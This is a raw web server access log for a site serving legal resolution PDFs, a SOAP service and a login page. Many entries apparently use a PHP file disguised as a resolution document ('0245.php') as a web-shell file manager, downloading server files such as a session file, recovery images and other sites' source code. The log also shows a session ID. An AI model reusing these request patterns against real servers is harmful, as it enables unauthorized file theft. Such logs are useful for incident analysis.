47.128.50.216 - - [27/Jun/2024:10:37:37 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Ctmp&f=sess_0sqjco1t0idhpe9sb5pjs8j8arnp85t0&ft=download HTTP/1.1" 200 10901
66.249.66.11 - - [27/Jun/2024:10:37:48 -0500] "GET /BLA/resoluciones/AUTOS%202023/3552.pdf HTTP/1.1" 200 318992
52.167.144.221 - - [27/Jun/2024:10:38:04 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2024%2F HTTP/1.1" 200 20744
201.245.192.253 - - [27/Jun/2024:10:38:07 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.245.221.92 - - [27/Jun/2024:10:38:20 -0500] "HEAD / HTTP/1.1" 200 -
52.167.144.238 - - [27/Jun/2024:10:38:25 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2021%2F HTTP/1.1" 200 447527
201.245.192.253 - - [27/Jun/2024:10:38:24 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
47.128.63.215 - - [27/Jun/2024:10:38:44 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006&f=RESOLUCION+881+DE+2006.PDF&ft=download HTTP/1.1" 200 10429
47.128.63.185 - - [27/Jun/2024:10:39:00 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbreclima%5Cwp-includes%5CID3&f=module.audio.flac.php&ft=download HTTP/1.1" 200 18066
45.173.12.216 - - [27/Jun/2024:10:39:01 -0500] "GET /BLA/resoluciones/AUTOS%202014/3115.pdf HTTP/1.1" 200 503297
66.249.66.38 - - [27/Jun/2024:10:39:02 -0500] "GET /js/url.js HTTP/1.1" 404 1198
66.249.66.39 - - [27/Jun/2024:10:39:03 -0500] "GET /css/style.css HTTP/1.1" 200 3473
201.245.192.253 - - [27/Jun/2024:10:39:07 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [27/Jun/2024:10:39:13 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.63.21 - - [27/Jun/2024:10:39:15 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=C%3A%5CRecovery%5C0432c6d5-b646-11df-b61b-c4a12c049bbd&f=boot.sdi&ft=download HTTP/1.1" 200 3169958
66.249.66.12 - - [27/Jun/2024:10:39:21 -0500] "GET /BLA/resoluciones/AUTOS%202023/05526.pdf HTTP/1.1" 200 958079
172.22.2.4 - - [27/Jun/2024:10:37:49 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [27/Jun/2024:10:39:27 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 34961
47.128.38.1 - - [27/Jun/2024:10:39:29 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Csig%5CGesti%F3n+Ambiental%5C&f=126PM03-PR05.pdf&ft=download HTTP/1.1" 200 351903
66.249.66.12 - - [27/Jun/2024:10:39:36 -0500] "GET /BLA/resoluciones/AUTOS%202023/0663.pdf HTTP/1.1" 200 732659
47.128.63.158 - - [27/Jun/2024:10:39:44 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CAutoliquidacion2020%5CLicencia+Ambiental%5C&f=Anexo_2_FORMATO_PREMILINAR_DOCUMENTACI%D3N_EIA.pdf&ft=download HTTP/1.1" 200 315007
47.128.33.126 - - [27/Jun/2024:10:40:01 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CPMA-RAMSAR%5C1.+Portada+-+Preambulo&f=Portada+-+Preambulo.pdf&ft=download HTTP/1.1" 200 3292823
201.245.192.253 - - [27/Jun/2024:10:40:07 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [27/Jun/2024:10:40:13 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 34530
47.128.118.86 - - [27/Jun/2024:10:40:16 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbreclima%5Cwp-includes%5CID3&f=module.audio.ac3.php&ft=download HTTP/1.1" 200 19008
172.22.2.4 - - [27/Jun/2024:10:38:40 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60380
47.128.21.245 - - [27/Jun/2024:10:40:30 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006&f=RESOLUCION+2514+DE+2006.PDF&ft=download HTTP/1.1" 200 20117
47.128.54.110 - - [27/Jun/2024:10:40:48 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5C&f=RESOLUCION+23+DE+2006.PDF&ft=download HTTP/1.1" 200 1040021
47.128.118.42 - - [27/Jun/2024:10:40:59 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cvideos%5C&f=60Sgs_Nov12.flv&ft=download HTTP/1.1" 200 20127
201.245.192.253 - - [27/Jun/2024:10:41:07 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [27/Jun/2024:10:41:13 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.66.13 - - [27/Jun/2024:10:41:22 -0500] "GET /BLA/resoluciones/AUTOS%202023/1710.pdf HTTP/1.1" 200 395992
66.249.66.12 - - [27/Jun/2024:10:41:22 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/5856.pdf HTTP/1.1" 304 -
201.245.192.253 - - [27/Jun/2024:10:41:37 -0500] "GET /sipse/faces/index.xhtml HTTP/1.1" 200 677
201.245.192.253 - - [27/Jun/2024:10:41:37 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
201.245.192.253 - - [27/Jun/2024:10:41:37 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
201.245.192.253 - - [27/Jun/2024:10:41:37 -0500] "GET /sipse/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12402
201.245.192.253 - - [27/Jun/2024:10:41:37 -0500] "GET /sipse/js/disable_browser_buttons.js HTTP/1.1" 200 3230
201.245.192.253 - - [27/Jun/2024:10:41:37 -0500] "GET /sipse/js/funciones.js HTTP/1.1" 200 12592
201.245.192.253 - - [27/Jun/2024:10:41:37 -0500] "GET /sipse/css/custom_css_sg_prime_login.css HTTP/1.1" 200 443
201.245.192.253 - - [27/Jun/2024:10:41:37 -0500] "GET /sipse/css/custom_css_sg.css HTTP/1.1" 200 9694
201.245.192.253 - - [27/Jun/2024:10:41:37 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
201.245.192.253 - - [27/Jun/2024:10:41:37 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 200 542
201.245.192.253 - - [27/Jun/2024:10:41:37 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 200 105384
